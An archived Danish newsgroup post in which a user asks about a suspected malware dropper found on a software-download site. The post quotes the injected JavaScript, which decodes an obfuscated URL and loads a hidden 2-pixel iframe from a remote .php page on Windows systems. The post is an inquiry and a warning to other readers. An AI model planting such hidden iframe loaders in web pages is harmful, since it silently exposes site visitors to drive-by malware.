/ Forside / Teknologi / Udvikling / PHP / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
PHP
#NavnPoint
rfh 3959
natmaden 3372
poul_from 3310
funbreak 2700
stone47 2230
Jin2k 1960
Angband 1743
Bjerner 1249
refi 1185
10  Interkril.. 1146
Malware dropper?
Fra : Axel Hammerschmidt


Dato : 21-02-09 18:57

X-post: dk.edb.sikkerhed.virus og
dk.edb.internet.webdesign.serverside.php

Follow-up: dk.edb.sikkerhed.virus

Da jeg søgt på Google kom bl.a denne site frem (denne her er nu
sidste side, så det var nok ikke den som Google havde indekseret):

http://www.softseaXXX.com/software/Wireless-Communication-List-5.html

De 3 X'er er der af sikkerhedshensyn. Brug en live CD eller lignende
hvis du besøger stedet.

Da jeg var inde første gang med IE7 (XP Pro, brugerkonto med
begrænset rettigheder) fik jeg en advarsel i pop-up blokeren om at
"noget" ville installerer et program. Ctrl-Alt-Del -> Programmer ->
Afslut job (Internet Explorer).

Så booter jeg fra en BackTrack3 live CD og vender tilbage.

Aller nederst på den sidste side finder jeg det her:

<script language="javascript">
var agt=navigator.userAgent.toLowerCase();
var win=((agt.indexOf("win")!=-1) || (agt.indexOf("32b")!=-1));
var nu='%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u002d%
u0073'+
'%u006b%u0069%u0070%u002e%u0063%u006e%u002f%u0073%u0065%
u006f'+
'%u002e%u0070%u0068%u0070';
var ko=unescape(nu);
if (win)
{
var ahw=document.createElement('iframe');
ahw.style.border='0px';ahw.style.width='2px';
ahw.style.height='2px';ahw.src=ko;
document.body.appendChild(ahw);
}
</script>

Linierne er for lange til min News reader, men det der "%u00XY"
halløj linker til en side i Kina og en .php-fil.

Første linie ser sådan ud:

'%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u002d%u0073'+

Anden linie:

'%u006b%u0069%u0070%u002e%u0063%u006e%u002f%u0073%u0065%u006f'+

Tredie linie

'%u002e%u0070%u0068%u0070'

Jeg kan godt oversætte ovenstående til det, der linkes til.

Men er der mon een der kan forklare mig hvad der sker. Jeg har prøvet
med at gå ind på kina-siden igen med IE7 og Firefox i BT3, men der
sker tilsyneladende ikke længere noget. I hvert fald popper advarslen
ikke op mer' i IE7. Der kommer noget med scripts i Firefox, men
scripts er delvis sat ud af kraft - BT3 er jo et sikkerheds suite.


--
"Well, opinions are like assholes. Everybody has one." Dirty Harry

 
 
Søg
Reklame
Statistik
Spørgsmål : 177558
Tips : 31968
Nyheder : 719565
Indlæg : 6408914
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste